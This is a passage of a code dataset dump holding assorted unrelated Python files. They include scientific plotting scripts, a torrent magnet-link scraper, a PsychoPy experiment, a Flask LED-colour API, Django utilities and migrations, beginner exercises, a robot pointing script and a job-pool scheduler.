ae_weights=ae_weights, x=x_test)\n redec.model.load_weights(galaxy_results + '/DEC_model_final.h5')\n #pca_plot(redec.encoder, np.concatenate((x_train, x_train_dev, x_valid)), \\\n # y=np.concatenate((y_train_vote_fractions, y_train_dev_vote_fractions, -1*np.ones(y_valid.shape))), \\\n # cluster_centres=get_cluster_centres(redec), labels=['bogus', 'real'], lcolours=['#D138BF','#7494EA'], \\\n # ulcolour='#A0A4B8', ccolour='#21D19F', legend=False)\n\n pca_plot(redec.encoder, x_test, y=y_test, \\\n cluster_centres=get_cluster_centres(redec), labels=[str(i) for i in range(10)], lcolours=lcolours, \\\n ulcolour='#A0A4B8', ccolour='#21D19F', legend=False)\n\ndef main():\n x, y = load_galaxy()\n # split the data into training, validation and test sets\n #m = x.shape[0]\n #m = m - 20000\n #sample_frac = 0.01 # sampling 1% of the points\n #split = int(sample_frac*m)\n #print(split)\n\n # the training set acts as the sample of data for which we query volunteer classifications.\n # Here the data is sampled 
uniformly at random from the entire data set, targeting the most densely populated regions\n # of feature space.\n #x_train = x[:split]\n #y_train = y[:split]\n #x_train_dev = x[split:2*split]\n #y_train_dev = y[split:2*split]\n\n #x_valid = x[50000:60000]\n #y_valid = y[50000:60000]\n\n x_test = x[60000:]\n y_test = y[60000:]\n print(x_test.shape)\n\n clickable_analysis(x_test, y_test)\n\nif __name__ == '__main__':\n main()\n","sub_path":"plot_galaxies.py","file_name":"plot_galaxies.py","file_ext":"py","file_size_in_byte":5661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"137238534","text":"#import urllib2 \nimport urllib.request\nimport re\nimport sys\ndef getUrlList(urlPath):\n\tresponse = urllib.request.urlopen(urlPath)\n\thtml = response.read()\n\thtml = html.decode('utf-8')\n\tpattern = re.compile(r'http://www\\.btspread\\.com/magnet/detail/hash/[A-F0-9]+')\n\tpatFind = pattern.search(html)\n\tif (patFind):\n\t\tmatchList = pattern.findall(html)\n\t\treturn matchList\n\treturn None\n\ndef getMagnet(urlPath):\n\tresponse = urllib.request.urlopen(urlPath)\n\thtml = response.read()\n\thtml = html.decode('utf-8')\n\tpattern = re.compile(r'(magnet:\\?xt=urn:btih:[^\"\\']+)\" class=')\n\tpatFind = pattern.search(html)\n\tif (patFind):\n\t\tprint(patFind.group(1) + '\\n')\n\t\treturn patFind.group(1) + '\\n'\n\treturn None\n\ndef getAllMagnet(code):\n\tprint('hello')\n\tList = getUrlList('http://www.btspread.com/search/' + code)\n\tif (List != None):\n\t\tmagList = [None] * len(List)\n\t\tfor i in range(len(List)):\n\t\t\tmagList[i] = getMagnet(List[i])\n\t\tprint('hello')\n\t\tprint(magList)\n\t\treturn magList\n\treturn None\n\n#if (len(sys.argv) == 2):\n#\tgetAllMagnet(sys.argv[1])\n","sub_path":"src/magnet.py","file_name":"magnet.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"168290263","text":"import time\nimport Stepper\n\n\"\"\"\n 1 2 3 4 5 6 7 8\n \nPin1 x x x\nPin2 x x x\nPin3 x x x\nPin4 x x x\n\n\"\"\"\n\nbounds = 10\n\nprint('Init with bounds ' + str(bounds))\nstepper = Stepper.Stepper(bounds)\nprint('Test LEFT_TURN...')\nstepper.LEFT_TURN(9)\ntime.sleep(0.5)\nprint('Test RIGHT_TURN...')\nstepper.RIGHT_TURN(18)\ntime.sleep(0.5)\nprint('Calibrate...')\nstepper.calibrate()\nprint('Test done.')\n","sub_path":"modules/stepmotorTest.py","file_name":"stepmotorTest.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"636901368","text":"def getPizzas(person):\n result_pizzas = []\n while True:\n try:\n input_pizza = input()\n except EOFError:\n break\n if input_pizza == \"\":\n break\n result_pizzas.append(input_pizza)\n\n print(person + \" favorite pizzas are:\")\n\n for pizza in result_pizzas:\n print(pizza)\n \ngetPizzas(\"My\")\ngetPizzas(\"My friends\")","sub_path":"testing/markus.py","file_name":"markus.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"498468774","text":"\"\"\"\nLogger\n===========\n\nSetup a logger with two handlers to remove redundancy between logs entries\nOne is a stream handler for any messages to the console. 
The other is\neither a file handler or a null handler.\n\n\"\"\"\n\nfrom pathlib import Path\nimport yaml\nimport logging\nimport logging.config\nfrom concurrent_log_handler import ConcurrentRotatingFileHandler\n\n# =============================================================================\n# Global Variables\n# =============================================================================\nLEVEL_DICT = {\n \"debug\": logging.DEBUG,\n \"info\": logging.INFO,\n \"warning\": logging.WARNING,\n \"error\": logging.ERROR,\n \"critical\": logging.CRITICAL,\n}\n\nLOG_FORMAT = logging.Formatter(\n \"%(asctime)s [line %(lineno)d] %(name)s.%(funcName)s - %(levelname)s: %(message)s\"\n)\n# Get the configuration file path, should be in same directory as this file\nCONF_PATH = Path(__file__).parent\nCONF_FILE = Path.joinpath(CONF_PATH, \"logging_config.yaml\")\n\n# make a folder for the logs to go into.\nLOG_PATH = CONF_PATH.parent.parent.joinpath(\"logs\")\n\nif not LOG_PATH.exists():\n LOG_PATH.mkdir()\n\nif not CONF_FILE.exists():\n CONF_FILE = None\n\n\ndef load_logging_config(config_fn=CONF_FILE):\n \"\"\"\n configure/setup the logging according to the input configfile\n\n :param configfile: .yml, .ini, .conf, .json, .yaml.\n Its default is the logging.yml located in the same dir as this module.\n It can be modofied to use env variables to search for a log config file.\n \"\"\"\n if config_fn:\n config_file = Path(config_fn)\n with open(config_file, \"r\") as fid:\n config_dict = yaml.safe_load(fid)\n\n else:\n config_dict = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"formatters\": {\n \"standard\": {\n \"format\": \"%(asctime)s [line %(lineno)d] %(name)s.%(funcName)s - %(levelname)s: %(message)s\",\n \"datefmt\": \"%Y-%m-%dT%H:%M:%S\",\n }\n },\n \"handlers\": {\n \"console\": {\n \"class\": \"logging.StreamHandler\",\n \"level\": \"INFO\",\n \"formatter\": \"standard\",\n \"stream\": \"ext://sys.stdout\",\n }\n },\n \"loggers\": {\n \"__main__\": {\n \"level\": \"DEBUG\",\n \"handlers\": [\"console\"],\n \"propagate\": False,\n }\n },\n \"root\": {\"level\": \"DEBUG\", \"handlers\": [\"console\"], \"propogate\": False},\n }\n\n logging.config.dictConfig(config_dict)\n\n\ndef setup_logger(logger_name, fn=None, level=\"debug\"):\n \"\"\"\n Create a logger, can write to a separate file. 
This will write to\n the logs folder in the mt_metadata directory.\n\n :param logger_name: name of the logger, typically __name__\n :type logger_name: string\n :param fn: file name to write to, defaults to None\n :type fn: TYPE, optional\n :param level: DESCRIPTION, defaults to \"debug\"\n :type level: TYPE, optional\n :return: DESCRIPTION\n :rtype: TYPE\n\n \"\"\"\n\n logger = logging.getLogger(logger_name)\n\n # if there is a file name create file in logs directory\n if fn is not None:\n # need to clear the handlers to make sure there is only\n # one call per logger plus stdout\n if logger.hasHandlers():\n logger.handlers.clear()\n\n logger.propagate = False\n # want to add a stream handler for any Info print statements as stdOut\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(LOG_FORMAT)\n stream_handler.setLevel(LEVEL_DICT[\"info\"])\n logger.addHandler(stream_handler)\n\n fn = LOG_PATH.joinpath(fn)\n exists = False\n if fn.exists():\n exists = True\n\n if fn.suffix not in [\".log\"]:\n fn = Path(fn.parent, f\"{fn.stem}.log\")\n\n # fn_handler = logging.FileHandler(fn)\n fn_handler = ConcurrentRotatingFileHandler(fn, maxBytes=2 ** 21, backupCount=2)\n fn_handler.setFormatter(LOG_FORMAT)\n fn_handler.setLevel(LEVEL_DICT[level.lower()])\n logger.addHandler(fn_handler)\n if not exists:\n logger.info(f\"Logging file can be found {logger.handlers[-1].baseFilename}\")\n\n return logger\n","sub_path":"mth5/utils/mth5_logger.py","file_name":"mth5_logger.py","file_ext":"py","file_size_in_byte":4367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"402149588","text":"import sys\nimport os\nimport datetime\nimport time\nimport random\nimport util\nfrom util import defaults\nfrom psychopy import visual, core, event\n\nCOLORS = ['red', 'green', 'yellow']\n\nconfig = {}\nif len(sys.argv) == 2:\n config_file = sys.argv[1]\n if not os.path.exists(config_file):\n sys.exit('config file path %s does not exist'%config_file)\n config = util.load_config(config_file)\n\nparams = defaults.load_params(config)\n\nif not os.path.exists(params['save_location']):\n os.makedirs(params['save_location'])\n\nstart_time = datetime.datetime.now().strftime('%Y%m%d.%H%M%S')\nparams['start_time'] = start_time\n\n# Initialize data file writer\nsave_file_path = os.path.join(params['save_location'], start_time)\nsave_file = open(save_file_path, \"w\")\n\n# Write params\nsave_file.write('params: ' + str(params) + '\\n')\n\n# Set up conditions\nclass condition(object):\n def __init__(self, x, y, color=[1,1,1]):\n self.x = x\n self.y = y\n self.color = color\n\nconditions = []\nfixation_cross_size = params['fixation_cross_size']\nstimulus_radius = params['stimulus_radius']\nmax_x = params['x_size'] - stimulus_radius\nmin_x = -max_x\nmax_y = params['y_size'] - stimulus_radius\nmin_y = -max_y\ngrid_size = params['grid_size']\n\nfor color in COLORS:\n x = min_x\n while x <= (max_x - grid_size):\n y = min_y\n while y <= (max_y - grid_size):\n if not (-fixation_cross_size < x < fixation_cross_size or -fixation_cross_size < y < fixation_cross_size):\n for n in range(params['n_trials_per_location']):\n conditions.append(condition(x, y, color))\n y += grid_size\n x += grid_size\nrandom.shuffle(conditions) # shuffle the conditions\n\n# initialize window\n# TODO: This uses the 'testMonitor' and needs to be fixed!\nwin = visual.Window([params['screen_x'],params['screen_y']], monitor=\"testMonitor\", units=\"deg\", screen=params['screen_number'], 
rgb=params['screen_rgb'])\nfixation = visual.GratingStim(win, tex=None, mask='cross', sf=0, size=fixation_cross_size,\n name='fixation', autoLog=False)\n\ntrial_number = 0\nnum_conditions = len(conditions)\nfixation = visual.GratingStim(win, tex=None, mask='cross', sf=0, size=1,\n name='fixation', autoLog=False)\nstimulus = visual.Circle(win, radius=stimulus_radius, fillColor='white')\n\nclock = core.Clock()\nquit = False\nwhile trial_number < num_conditions and not quit:\n trial_condition = conditions[trial_number]\n presentation_time = random.choice(params['presentation_time'])\n isi = random.choice(params['isi_ms']) / 1000.\n trial_data = {'trial_num': trial_number,\n 'x': trial_condition.x,\n 'y': trial_condition.y,\n 'color': trial_condition.color,\n 'isi': isi,\n 'presentation_time': presentation_time,\n 'catch_trial': False}\n allKeys = event.waitKeys()\n # Exit if q pushed\n if 'q' in allKeys:\n break\n \n # present fixation\n fixation.draw()\n win.flip()\n\n # wait isi_ms before presenting stimulus\n core.wait(isi)\n\n # present stimulus if not a catch trial\n present_stimulus = True\n if random.random() < params['prob_catch_trial']:\n trial_data['catch_trial'] = True\n present_stimulus = False\n else:\n trial_number += 1 # only increment trial if stimulus presented\n \n stim_start = time.time()\n response = None\n while (time.time() - stim_start) < (presentation_time / 1000.) and response is None:\n fixation.draw()\n if present_stimulus:\n stimulus.setPos([trial_condition.x, trial_condition.y])\n stimulus.lineColor = trial_condition.color\n stimulus.fillColor = trial_condition.color\n stimulus.draw()\n win.flip()\n allKeys = event.getKeys()\n if len(allKeys) > 0:\n if 'j' in allKeys:\n response = 'red'\n elif 'k' in allKeys:\n response = 'blue'\n elif 'l' in allKeys:\n response = 'purple'\n elif 'f' in allKeys:\n response = 'not_seen'\n elif 'q' in allKeys:\n response = 'quit'\n quit = True\n else:\n response = 'invalid'\n event.clearEvents()\n while (time.time() - stim_start) < (params['timeout_ms'] / 1000.) 
and response is None:\n fixation.draw()\n win.flip()\n allKeys = event.getKeys()\n if len(allKeys) > 0:\n if 'j' in allKeys:\n response = 'red'\n elif 'k' in allKeys:\n response = 'blue'\n elif 'l' in allKeys:\n response = 'purple'\n elif 'f' in allKeys:\n response = 'not_seen'\n elif 'q' in allKeys:\n response = 'quit'\n quit = True\n else:\n response = 'invalid'\n event.clearEvents()\n print('\\a')\n fixation.draw()\n win.flip()\n trial_data['response'] = response if response is not None else 'TIMEOUT'\n event.clearEvents()\n save_file.write(str(trial_data) + '\\n')\n\nsave_file.close()\n\n","sub_path":"deprecated/demo2.py","file_name":"demo2.py","file_ext":"py","file_size_in_byte":5178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"157222153","text":"import json\nimport os\nimport sys\n\nfrom flask import Flask, Response, render_template, request, redirect, url_for\nimport sender\nimport color\n\napp = Flask(__name__)\nqueue = sender.start_sender()\n\n\ndef set_rgb_time(r, g, b, time):\n c = color.Color(r, g, b, time)\n queue.send(c)\n return json.dumps([c.red, c.green, c.blue])\n\n\n@app.route('/api/r/<int:r>/g/<int:g>/b/<int:b>')\ndef api_rgb(r, g, b):\n return set_rgb_time(r, g, b, 0)\n\n\n@app.route('/api/r/<int:r>/g/<int:g>/b/<int:b>/time/<int:time>')\ndef api_rgb_time(r, g, b, time):\n return set_rgb_time(r, g, b, time)\n\n\n@app.route('/api/list')\ndef api_list():\n json_list = []\n for col in queue.list_queue():\n json_list.append({\n 'rgb': [col.red, col.green, col.blue],\n 'time': col.time\n })\n return Response(json.dumps(json_list), mimetype='application/json')\n\n\n@app.route('/sysinfo')\ndef sysinfo():\n uname = os.uname()\n sysinfo_all = {\n 'OS': uname[0],\n 'Host': uname[1],\n 'Version': uname[2],\n 'Description': uname[3],\n 'Arch': uname[4]\n }\n return render_template('sysinfo_all.html', pyversion=sys.version,\n sysinfo=sysinfo_all, show_version=True)\n\n\n@app.route('/', methods=['POST', 'GET'])\ndef root():\n if request.method == 'POST':\n try:\n red = int(request.form['red'])\n green = int(request.form['green'])\n blue = int(request.form['blue'])\n queue.send(color.Color(red, green, blue))\n except:\n print('Some error happened - Redirecting.')\n finally:\n return redirect(url_for('root'))\n else:\n return '''<form method=\"post\">\n R: <input type=\"text\" name=\"red\">\n G: <input type=\"text\" name=\"green\">\n B: <input type=\"text\" name=\"blue\">\n <input type=\"submit\">\n </form>\n 
'''\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0', port=5000)\n","sub_path":"scripts/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"336738020","text":"\n\ndef get_title_verifikasi(request, pengajuan_obj, skizin_obj):\n\ttitle_verifikasi = \"\"\n\tif request.user.groups.filter(name=\"Operator\"):\n\t\tif pengajuan_obj.status == 11 or pengajuan_obj.status == 6 or pengajuan_obj.status == 4:\n\t\t\ttitle_verifikasi = \"Validasi Persyaratan\"\n\tif request.user.groups.filter(name=\"Kabid\"):\n\t\tif pengajuan_obj.status == 2:\n\t\t\tif skizin_obj:\n\t\t\t\tif skizin_obj.status == 6 or skizin_obj.status == 4:\n\t\t\t\t\ttitle_verifikasi = \"Verifikasi Draf Izin Kabid\"\n\t\telif pengajuan_obj.status == 4:\n\t\t\ttitle_verifikasi = \"Verifikasi Kabid Pelayanan Perizinan\"\n\tif request.user.groups.filter(name=\"Pembuat Surat\"):\n\t\tif skizin_obj == None and pengajuan_obj.status == 2:\n\t\t\ttitle_verifikasi = \"Pembuatan Draft SKIzin\"\n\tif request.user.groups.filter(name=\"Kadin\"):\n\t\tif pengajuan_obj.status == 2 and skizin_obj.status == 4 or skizin_obj.status == 9:\n\t\t\ttitle_verifikasi = \"Verifikasi Draf Izin Kadin\"\n\tif request.user.groups.filter(name=\"Penomoran\"):\n\t\tif pengajuan_obj.status == 2 and skizin_obj.status == 9 or skizin_obj.status == 10:\n\t\t\ttitle_verifikasi = \"Registrasi Izin (Penomoran Izin)\"\n\tif request.user.groups.filter(name=\"Cetak\"):\n\t\tif pengajuan_obj.status == 2:\n\t\t\tif skizin_obj:\n\t\t\t\tif skizin_obj.status == 6 or skizin_obj.status == 4:\n\t\t\t\t\ttitle_verifikasi = \"Cetak Izin\"\n\tif request.user.groups.filter(name=\"Selesai\"):\n\t\tif pengajuan_obj.status == 2 and skizin_obj.status == 2:\n\t\t\ttitle_verifikasi = \"Stample SK Izin\"\n\t\telif pengajuan_obj.status == 1 and skizin_obj.status == 1:\n\t\t\ttitle_verifikasi = \"Pengajuan Selesai\"\n\treturn title_verifikasi\n\ndef send_email_html(emailto, subject, objects_, template_):\n from django.core.mail import EmailMessage\n from django.conf import settings\n from django.template import Context, Template\n from django.template.loader import get_template\n from django.template.loader import render_to_string\n\n html_content = render_to_string(template_, {'obj': objects_})\n \n email = EmailMessage(subject, html_content, settings.DEFAULT_FROM_EMAIL, [emailto])\n email.content_subtype = \"html\"\n res = email.send()\n\n return res","sub_path":"izin_dinkes/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"136197123","text":"import MySQLdb\nimport unittest\n\n\n# All TABLES in the database Schema\nexpected_table_names = [\"auth_group\",\n \"auth_group_permissions\",\n \"auth_permission\",\n \"auth_user\",\n \"auth_user_groups\",\n \"auth_user_user_permissions\",\n \"autoreduce_webapp_cache\",\n \"autoreduce_webapp_experimentcache\",\n \"autoreduce_webapp_instrumentcache\",\n \"autoreduce_webapp_usercache\",\n \"django_admin_log\",\n \"django_content_type\",\n \"django_migrations\",\n \"django_session\",\n \"reduction_variables_instrumentvariable\",\n \"reduction_variables_runvariable\",\n \"reduction_variables_variable\",\n \"reduction_viewer_datalocation\",\n \"reduction_viewer_experiment\",\n \"reduction_viewer_instrument\",\n \"reduction_viewer_notification\",\n \"reduction_viewer_reductionlocation\",\n 
\"reduction_viewer_reductionrun\",\n \"reduction_viewer_setting\",\n \"reduction_viewer_status\"]\n\n\nclass TestDatabaseGeneration(unittest.TestCase):\n\n def test_localhost_db_construction(self):\n \"\"\"\n Test that the local host database on travis is correctly\n generated from the .sql construction files\n \"\"\"\n db = MySQLdb.connect(host=\"localhost\",\n user=\"test-user\",\n passwd=\"pass\",\n db=\"autoreduction\")\n\n cur = db.cursor()\n cur.execute(\"SHOW TABLES\")\n for row in cur.fetchall():\n self.assertTrue(row[0] in expected_table_names, (\"%s was not found in expected TABLE names\" % row[0]))\n\n db.close()\n","sub_path":"Scripts/Build/test/test_db_generation.py","file_name":"test_db_generation.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"390705541","text":"from netCDF4 import Dataset as ds\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom glob import glob\nfrom files_n_vars import *\n\ndef avgDataFilesLatLon(filedir, var, num_files, filetype, unit_conv, depth, avg_coord):\n results = glob('{0}/*{1}*'.format(filedir, filetype))\n arr_tot = np.zeros((46,72))\n for filename in results:\n nc_i = ds(filename, 'r+', format='NETCDF4')\n\n if filetype == 'aijpc':\n area_arr = nc_i['axyp'][:]\n elif filetype == 'oijlpc':\n area_arr = nc_i['oxyp3'][:][depth]\n\n if depth == None:\n arr = nc_i[var][:]\n else:\n arr = nc_i[var][:][depth]\n\n arr_tot = arr_tot + arr\n\n arr_avg = (arr_tot * unit_conv) / num_files\n if len(arr_avg.shape) == 3:\n raise(ValueError, \"This array is 3D, so the axes you are averaging over are invalid.\")\n if 'aqua' in filedir:\n arr_avg = np.roll(arr_avg, (arr_avg.shape[1]) // 2, axis=1)\n if avg_coord == 'lat':\n avg_axis = 1\n elif avg_coord == 'lon':\n avg_axis = 0\n avg_arr = np.sum(arr_avg * area_arr, axis=avg_axis) / np.sum(area_arr, axis=avg_axis)\n return avg_arr\n\n\ndef makeSubplot(col_list, ax, row, filetype, avg_coord, num_files=10, unit_conv=1, depth=None):\n if avg_coord == 'lat':\n x = row['lat']\n x_label = 'Latitude'\n elif avg_coord == 'lon':\n x = row['lon']\n x_label = 'Longitude'\n var = row['var']\n title = row['title']\n units = row['units']\n for col in col_list:\n filedir = col['filedir']\n val_arr = avgDataFilesLatLon(filedir, var, num_files, filetype, unit_conv, depth, avg_coord)\n SA = str(col['SA']) + '%'\n if SA == '0%':\n SA = 'Aqua'\n ax.plot(x, val_arr, label=SA)\n if var == 'tsurf':\n ax.axhline(linestyle='--', color='k')\n ax.set_title('Average ' + title)\n ax.set_xlabel(x_label)\n ax.set_ylabel(units)\n\ndef latLonAvgPlot():\n col_list = [col_0, col_11, col_39]\n row = row_tsurf\n fig, ax = plt.subplots()\n\n makeSubplot(col_list, ax, row, filetype='aijpc', avg_coord='lon')\n ax.legend()\n fig.tight_layout(w_pad = 2.25)\n file_name = 'plots/lon_tsurf'\n # plt.savefig(file_name+'.svg')\n plt.savefig(file_name+'.pdf')\n plt.show()\n","sub_path":"plot_scripts/latLonAvgPlot.py","file_name":"latLonAvgPlot.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"180075252","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.core.validators\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('network', '0007_auto_20150505_0129'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='CourseWork',\n fields=[\n ('id', 
models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('creation_date', models.DateTimeField(auto_now=True, null=True)),\n ('coursework_id', models.CharField(max_length=10, unique=True, null=True)),\n ('title', models.CharField(max_length=30)),\n ('description', models.CharField(max_length=75)),\n ('submission_type', models.CharField(default=b'Online', max_length=30, choices=[(b'In class', b'In class'), (b'Online', b'Online')])),\n ('deadline', models.DateTimeField()),\n ('attachment', models.FileField(default=None, null=True, upload_to=b'', blank=True)),\n ('section', models.ForeignKey(to='network.Section')),\n ],\n ),\n migrations.CreateModel(\n name='Submission',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('submission_date', models.DateTimeField(auto_now=True, null=True)),\n ('notes', models.CharField(max_length=150, null=True)),\n ('attachment', models.FileField(null=True, upload_to=b'', blank=True)),\n ('grade', models.IntegerField(validators=[django.core.validators.MaxValueValidator(100), django.core.validators.MinValueValidator(0)])),\n ('course_work', models.ForeignKey(to='network.CourseWork')),\n ('submitted_by', models.ForeignKey(to='network.Student')),\n ],\n ),\n migrations.AlterField(\n model_name='lecturer',\n name='academic_rank',\n field=models.CharField(max_length=50),\n ),\n migrations.AlterField(\n model_name='lecturer',\n name='admin_rank',\n field=models.CharField(max_length=50, null=True, blank=True),\n ),\n ]\n","sub_path":"network/migrations/0008_auto_20150506_0336.py","file_name":"0008_auto_20150506_0336.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"624566906","text":"# 11. Program lojalnościow\n\n# Księgarnia Serendipity Booksellers prowadzi program lojalnościowy, który\n# w zależności od liczby książek zakupionych przez klienta w danym miesiącu\n# nagradza go odpowiednią liczbą punktów. 
Punkty przyznawane są w następujący sposób:\n\n# jeżeli klient kupil 0 ksiązek, otrzymuje 0 punktów\n# jeżeli klient kupil 2 książki, otrzymuje 5 punktów\n# jeżeli klient kupil 4 książki, otrzymuje 15 punktów\n# jeżeli klient kupil 6 książek, otrzymuje 30 punktów\n# jeżeli klient kupil 8 lub więcej książek, otrzymuje 60 punktów\n\n# Opracuj program, który będzie prosił użytkownika o podanie liczby książek \n# zakupionych przez niego w danym miesiącu, a następnie wyświetli liczbę\n# przyznanych punktów.\n\nimport os\nos.system('cls') #Wyczyszczenie okna terminala\n\n\nzakupioneKsiazki = int(input(\"Podaj liczbę zakupionych książek w tym miesiącu: \"))\nif zakupioneKsiazki > 0:\n if zakupioneKsiazki < 2 and zakupioneKsiazki > 0:\n print(\"\\nMasz 0 punktów\")\n elif zakupioneKsiazki >= 2 and zakupioneKsiazki < 4:\n print(\"\\nMasz 5 punkty\")\n elif zakupioneKsiazki >= 4 and zakupioneKsiazki < 6:\n print(\"\\nMasz 15 punkty\")\n elif zakupioneKsiazki >= 6 and zakupioneKsiazki <8:\n print(\"\\nMasz 30 punkty\")\n elif zakupioneKsiazki >= 8:\n print(\"\\nMasz 60 punkty\")\nelse:\n print(\"\\nWprowadz liczbę dodatnią\")\n","sub_path":"Rozdzial3/11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"448725022","text":"#!/usr/bin/env python\n\nimport rospy\nimport baxter_interface\nimport argparse\nimport time\n\nfrom motion_consts import NEUTRAL_R, POINT\nfrom .log import log\n\nrospy.init_node('node')\n\nl_limb = baxter_interface.Limb('right')\n\ndef point(i_s):\n\tfor i in i_s:\n\t\tl_limb.move_to_joint_positions(POINT[i])\n\t\ttime.sleep(2)\n\tl_limb.move_to_joint_positions(NEUTRAL_R)\n\nparser = argparse.ArgumentParser(description=\"point at card parser\")\nparser.add_argument('--nargs-int-type', nargs='+', type=int)\n\t\n\nfor _, values in parser.parse_args()._get_kwargs():\n\tfor v in values:\n\t\tif v not in range(0,5):\n\t\t\tlog('all arguments must be integers from 0-4 inclusive')\n\tpoint(values)\n","sub_path":"baxter/point.py","file_name":"point.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"21475183","text":"import fcntl\nimport io\nimport logging\nimport os\nimport random\nimport re\nimport select\nimport shlex\nimport sys\nimport threading\nimport time\nfrom abc import ABCMeta, abstractmethod\nfrom dataclasses import dataclass, field\nfrom subprocess import STDOUT\nfrom typing import (\n IO,\n Any,\n Callable,\n Dict,\n Iterable,\n Iterator,\n List,\n Optional,\n Sequence,\n Tuple,\n Union,\n)\n\nfrom .context import Context\nfrom .util import FatalError, Process, require_program, run\n\n# TODO: rewrite this to use\n# https://docs.python.org/3/library/concurrent.futures.html?\n\n\n@dataclass\nclass Job:\n proc: Process\n jobid: str\n outfiles: List[str]\n\n nnodes: int = field(default=1, init=False)\n start_time: float = field(default_factory=time.time, init=False)\n onsuccess: Optional[Callable[[\"Job\"], None]] = field(default=None, init=False)\n onerror: Optional[Callable[[\"Job\"], None]] = field(default=None, init=False)\n output: str = field(default=\"\", init=False)\n\n @property\n def stdout(self) -> IO:\n return self.proc.stdout_io\n\n\n@dataclass\nclass ProcessJob(Job):\n outfile_handle: IO\n\n\n@dataclass\nclass SSHJob(Job):\n outfile_handle: IO\n node: str\n\n tunnel_src: Optional[int] = None\n tunnel_dest: Optional[int] = None\n\n\n@dataclass\nclass 
PrunJob(Job):\n nnodes: int\n\n logged: bool = False\n\n\nclass Pool(metaclass=ABCMeta):\n \"\"\"\n A pool is used to run processes in parallel as jobs when ``--parallel`` is\n specified on the command line. The pool is created automatically by\n :class:`Setup` and passed to :func:`Target.build` and :func:`Target.run`.\n However, the pool is only passed if the method implementation defines a\n parameter for the pool, i.e.::\n\n class MyTarget(Target):\n def build(self, ctx, instance, pool): # receives Pool instance\n ...\n def run(self, ctx, instance): # does not receive it\n ...\n\n The maximum number of parallel jobs is controlled by ``--parallelmax``. For\n ``--parallel=proc`` this is simply the number of parallel processes on the\n current machine. For ``--parallel=prun`` it is the maximum number of\n simultaneous jobs in the job queue (pending or running).\n \"\"\"\n\n poll_interval: float = 0.050 # seconds to wait for blocking actions\n\n jobs: Dict[int, Job]\n pollthread: Optional[threading.Thread]\n\n @abstractmethod\n def make_jobs(\n self,\n ctx: Context,\n cmd: Union[str, Iterable[str]],\n jobid_base: str,\n outfile_base: str,\n nnodes: int,\n **kwargs: Any,\n ) -> Iterator[Job]:\n pass\n\n @abstractmethod\n def process_job_output(self, job: Job) -> None:\n pass\n\n def __init__(self, logger: logging.Logger, parallelmax: int):\n \"\"\"\n :param logger: logging object for status updates (set to ``ctx.log``)\n :param parallelmax: value of ``--parallelmax``\n \"\"\"\n self.log = logger\n self.parallelmax = parallelmax\n self.jobs = {}\n self.pollthread = None\n\n def __del__(self) -> None:\n if self.pollthread is not None:\n self.done = True\n self.pollthread.join(self.poll_interval)\n\n def _start_poller(self) -> None:\n if self.pollthread is None:\n self.poller = select.epoll()\n self.pollthread = threading.Thread(\n target=self._poller_thread, name=\"pool-poller\"\n )\n self.pollthread.daemon = True\n self.done = False\n self.pollthread.start()\n\n def _poller_thread(self) -> None:\n # monitor the job queue for finished jobs, remove them from the queue\n # and call success/error callbacks\n while not self.done:\n for fd, flags in self.poller.poll(timeout=self.poll_interval):\n if flags & (select.EPOLLIN | select.EPOLLPRI):\n self.process_job_output(self.jobs[fd])\n\n if flags & select.EPOLLERR:\n self.poller.unregister(fd)\n job = self.jobs.pop(fd)\n self.onerror(job)\n\n if flags & select.EPOLLHUP:\n job = self.jobs[fd]\n if job.proc.poll() is None:\n self.log.debug(\n f\"job {job.jobid} hung up but does not yet have a \"\n \"return code, check later\"\n )\n continue\n\n self.poller.unregister(fd)\n del self.jobs[fd]\n\n if job.proc.poll() == 0:\n self.onsuccess(job)\n else:\n self.onerror(job)\n\n def _wait_for_queue_space(self, nodes_needed: int) -> None:\n if self.parallelmax is not None:\n\n def nodes_in_use() -> int:\n return sum(job.nnodes for job in self.jobs.values())\n\n while nodes_in_use() + nodes_needed > self.parallelmax:\n time.sleep(self.poll_interval)\n\n def wait_all(self) -> None:\n \"\"\"\n Block (busy-wait) until all jobs in the queue have been completed.\n Called automatically by :class:`Setup` after the ``build`` and ``run``\n commands.\n \"\"\"\n while len(self.jobs):\n 